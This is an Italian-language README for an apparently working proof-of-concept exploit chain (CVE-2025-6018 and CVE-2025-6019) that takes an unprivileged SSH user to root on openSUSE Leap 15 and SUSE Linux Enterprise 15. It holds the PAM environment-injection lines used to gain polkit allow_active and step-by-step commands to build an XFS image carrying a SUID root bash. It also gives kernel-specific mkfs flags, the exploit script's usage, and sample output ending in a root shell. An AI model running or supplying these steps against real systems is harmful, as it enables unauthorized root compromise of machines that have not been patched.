
CVE-2025-6018 CVE-2025-6019 PoC Exploit - Escalation locale dei privilegi in openSUSE/SUSE Linux Enterprise 15 - Bypass PAM + race condition XFS in udisks2 per LPE a root
PoC/Exploit funzionante per CVE-2025-6018 e CVE-2025-6019 - Escalation dei privilegi da utente non privilegiato a root su openSUSE Leap 15.x e SUSE Linux Enterprise 15.x
| CVE ID | Vulnerabilità | Impatto |
|---|---|---|
| CVE-2025-6018 | Iniezione di Variabili d'Ambiente PAM | Bypass dello stato polkit allow_active |
| CVE-2025-6019 | Race Condition nel Resize XFS di udisks2/libblockdev | Root shell |
Unprivileged SSH User → [CVE-2025-6018] → allow_active → [CVE-2025-6019] → ROOT
# Check vulnerability
./exploit.sh --check
# Setup PAM bypass (CVE-2025-6018)
./exploit.sh --setup
# Reconnect SSH, then: su - $USER
# Exploit (CVE-2025-6019)
./exploit.sh --exploit /tmp/xfs.img
# Result: ROOT SHELL
uid=1000(user) gid=1000(user) euid=0(root)
git clone https://github.com/DesertDemons/CVE-2025-6018-6019.git
cd CVE-2025-6018-6019
chmod +x *.sh
⚠️ Nota: openSUSE Leap 15.6 raggiunge la fine del ciclo di vita (End of Life) il 30 aprile 2026. Dopo questa data non verranno rilasciate ulteriori patch di sicurezza. Gli utenti dovrebbero migrare a Leap 16.0 o SLES con supporto esteso.
user_readenv=1allow_active: yes per le azioni udisks2./exploit.sh --check
./exploit.sh --setup
# Then: exit SSH, reconnect, run: su - $USER
./exploit.sh --exploit /tmp/xfs.img
./exploit.sh --auto /tmp/xfs.img
./exploit.sh --create-image
Eseguire sulla macchina ATTACCANTE come root:
⚠️ È OBBLIGATORIO utilizzare il binario
/usr/bin/bashdella vittima, non quello locale. Un binario bash proveniente da una distro diversa (Kali, Arch, Ubuntu, ecc.) fallirà sul target a causa della mancata corrispondenza ABI di glibc/librerie condivise — anche sulla stessa architettura x86_64.
Lo script rileva automaticamente la versione di xfsprogs e applica i flag corretti:
# Get victim's bash first
scp user@target:/usr/bin/bash /tmp/victim_bash
# Create image (auto-detects safe mkfs flags)
sudo ./create_image.sh /tmp/victim_bash xfs.img
# For SUSE 15 SP1-SP4 targets (kernel < 5.14), use compatibility mode:
sudo ./create_image.sh --compat /tmp/victim_bash xfs.img
sudo su -
# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash
# 2. Create 300MB XFS image with safe flags
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img
# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt
# 4. Copy victim's bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl
ls -la /tmp/mnt/xpl # MUST show: -rwsr-xr-x
# 5. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/
L'immagine XFS deve essere formattata con flag compatibili con il kernel del target. Le versioni più recenti di xfsprogs abilitano per impostazione predefinita funzionalità su disco che i kernel SUSE più vecchi non possono leggere, causando errori wrong fs type, bad superblock durante il mount di resize di udisks2.
| Target | Kernel | comando mkfs.xfs |
|---|---|---|
| SUSE 15 SP5-SP6 | 5.14 / 6.4 | mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img |
| SUSE 15 SP1-SP4 | 4.12 - 5.3 | mkfs.xfs -f -m crc=0,reflink=0 xfs.img |
Perché? exchange e parent sono funzionalità del kernel 6.10+ (abilitate per impostazione predefinita in xfsprogs 6.x). bigtime, inobtcount e nrext64 sono funzionalità del kernel 5.10+. Il comando "compat" per SP1-SP4 (-m crc=0,reflink=0) crea un formato XFS V4 con tutte le funzionalità moderne disabilitate, che funziona su ogni SP della serie SUSE 15.
Vulnerabilità: il modulo pam_env di PAM legge ~/.pam_environment con user_readenv=1 (impostazione predefinita su SUSE), consentendo l'iniezione di variabili d'ambiente.
Exploit: impostare XDG_SEAT=seat0 e XDG_VTNR=1 per indurre systemd-logind a concedere i privilegi polkit allow_active.
# ~/.pam_environment
XDG_SEAT=seat0
XDG_VTNR=1
Vulnerabilità: quando si ridimensiona il filesystem XFS tramite udisks2, libblockdev monta temporaneamente il filesystem senza il flag nosuid.
Exploit:
./exploit.sh --check
Output:
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO
./exploit.sh --setup
exit
ssh user@target
su - $USER
./exploit.sh --check
Output:
[+] allow_active status: YES
You have allow_active privileges!
# On attacker:
scp xfs.img user@target:/tmp/
./exploit.sh --exploit /tmp/xfs.img
Output:
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...
=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
root@target#